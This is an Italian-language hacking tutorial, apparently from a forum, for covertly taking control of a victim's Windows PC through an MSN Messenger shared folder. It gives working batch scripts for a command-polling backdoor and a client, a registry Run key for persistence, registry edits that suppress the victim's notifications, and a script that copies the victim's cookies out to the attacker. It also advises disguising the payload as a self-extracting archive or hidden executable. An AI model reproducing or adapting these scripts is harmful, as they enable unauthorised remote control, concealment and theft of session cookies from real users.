| Ecco come controllare un PC tramite msn e una cartella condivisa con la vittima
prima di tutto questi sono i 2bat principali, server e client:
server:
CODICE
CD "%userprofile%\Impost~1\Dati applicazioni\Microsoft\Messenger\VITTIMA\Sharing Folders\ATTACKER"
:1
IF EXIST comandi.xcom (goto 3) else (goto 2)
:2
ping 127.0.0.1 -n 10 -w 1000
goto 1
:3
MOVE /Y comandi.xcom %systemroot%\system32\comandi.bat
start %systemroot%\system32\comandi.bat
GOTO 1
EXIT
client:
CODICE
@echo off
:1
ECHO Inserire utente a cui inviare i comandi
set /P x=
ECHO Digitare i comandi e poi premere ctrl+z quando si ha finito.
COPY con comandi.xcom
MOVE comandi.xcom "%userprofile%\Impost~1\Dati applicazioni\Microsoft\Messenger\ATTACKER\Sharing Folders\%x%"
goto 1
queste sn le 2bat principali..se poi volete potete crearne 1altra x far eseguire il server a ogni boot:
CODICE
REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v NOME_CHIAVE /t REG_SZ /d PERCORSO_SERVER\NOME_SERVER /f
poi..visto che ogni volta ke eseguiamo un comando, la vittima riceve una notifica riguardo la cartella condivisa..disabilitiamo la notifica!
x farlo abbiamo bisogno di manovrare 1po' sul registro.
esportiamo l'elenco delle kiavi ke ci interessano cn qst comando:
CODICE
cd "%userprofile%\Impost~1\Dati applicazioni\Microsoft\Messenger\VITTIMA\Sharing Folders\ATTACKER"
reg export HKEY_CURRENT_USER\Software\Microsoft\MSNMessenger\PerPassportSettings kiave.txt
dovremmo avere una cosa del genere:
CODICE
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Microsoft\MSNMessenger\PerPassportSettings\100568147]
"DefaultSignInState"=dword:00000006
"UTL"=hex:3c,00,6d,00,73,00,6e,00,6f,00,62,00,6a,00,20,00,43,00,72,00,65,00,61,\
00,74,00,6f,00,72,00,3d,00,22,00,70,00,69,00,63,00,63,00,6f,00,6c,00,61,00,\
6d,00,69,00,73,00,73,00,39,00,30,00,40,00,79,00,61,00,68,00,6f,00,6f,00,2e,\
00,69,00,74,00,22,00,20,00,54,00,79,00,70,00,65,00,3d,00,22,00,33,00,22,00,\
........................
..........................
[HKEY_CURRENT_USER\Software\Microsoft\MSNMessenger\PerPassportSettings\100568147<--NUMERO-ID]
probabilmente troverete diversi ID..x sapere qual'č quello giusto provare a cerkare (CTRL+F) l'indirizzo email, o parte del nick e se la vittima ha configurato, non so, la cartella dove č salvata la cronologia, o le conversazioni, o qlkosa del genere, troverete qlke riferimento..quindi scorrete in alto e vedete a quale sottochiave appartiene il valore.
una volta trovato L'ID il comando x disabilitare la notifica poi č:
CODICE
reg add HKEY_CURRENT_USER\Software\Microsoft\MSNMessenger\PerPassportSettings\NUMEROID /v isFileSharingToastAllowed /f /d 0 /t REG_DWORD
a questo punto avete campo libero..qualche piccolo comando utile:
Rubare Cookies:
CODICE
@echo off
cd %userprofile%\Impost~1\Dati applicazioni\Microsoft\Messenger\VITTIMA\Sharing Folders\ATTACKER
md cookie
copy "%userprofile%\cookies\*.*" cookie
exit
P.S. ricordatevi sempre @echo off e exit, se volete rendere il comando invisibile
P.P.S. Fatevi furbi..servitevi di archivi autoestraenti e compilate le bat in exe in modalitą ghost
P.P.P.S. Non create 1000000bat da inviare alla vittima..basta solo ke la vittima lanci il server, tutto al + cn la bat ke aggiunge la kiave x l'esecuzione automatica al registro...il resto dei comandi li lanciate da remoto.
|
